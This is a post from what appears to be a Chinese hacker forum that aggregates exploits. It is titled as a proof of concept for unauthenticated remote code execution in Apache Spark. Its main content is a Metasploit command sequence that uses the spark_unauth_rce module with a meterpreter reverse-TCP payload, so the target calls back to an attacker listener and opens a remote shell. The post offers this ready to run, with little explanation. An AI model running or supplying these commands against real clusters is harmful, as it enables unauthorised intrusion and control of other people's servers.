黑客仓库

最全面知识的黑客论坛，全网最强大的漏洞数据聚合仓库丨黑客网站丨黑客论坛丨暗网丨红队武器库丨渗透测试丨POC/0day/Nday/1day丨网络安全丨黑客攻击丨服务器安全防御丨渗透测试入门丨网络技术交流丨蓝队丨护网丨红队丨欢迎来到黑客仓库，您可以在我们的论坛板块进行交流和学习。

立即注册账号！

POC Apache Spark 未授权访问漏洞

主题发起人 Shacker
开始时间 09 12, 2024

Shacker

黑客倉庫站長

贡献: 21%

09 12, 2024

JavaScript:

## 漏洞概述

如果管理节点未启动ACL（访问控制），我们将可以在集群中执行任意代码。

## 漏洞利用

```bash
use exploit/linux/http/spark_unauth_rce
set payload java/meterpreter/reverse_tcp
set rhost 192.168.226.140
set rport 6066

set lhost 192.168.226.134
set lport 4444
set srvhost 192.168.226.134
set srvport 8080
exploit
```

## 参考链接

https://github.com/vulhub/vulhub/blob/master/spark/unacc/README.md

POC Apache Solr

POC RCE（CVE-2020-9480）

点击展开...

好评 0 否决票

您必须登录或注册才可回复。

	POC Apache-spark Shacker 09 12, 2024 POC/?Day漏洞数据
	POC Apache Kylin Shacker 09 10, 2024 POC/?Day漏洞数据
	POC Apache Tapestry远程代码执行漏洞 Shacker 09 13, 2024 POC/?Day漏洞数据
	综合 Apache Flink 1.11.0 Shacker 09 10, 2024 POC/?Day漏洞数据
	POC Apache Struts2 Shacker 09 12, 2024 POC/?Day漏洞数据

本站需要使用 Cookie。如果您继续使用本站，则表示同意我们使用 Cookie。

接受了解更多。...

后退

顶部

黑客仓库

POC Apache Spark 未授权访问漏洞

论坛统计

新会员

在线会员

关于我们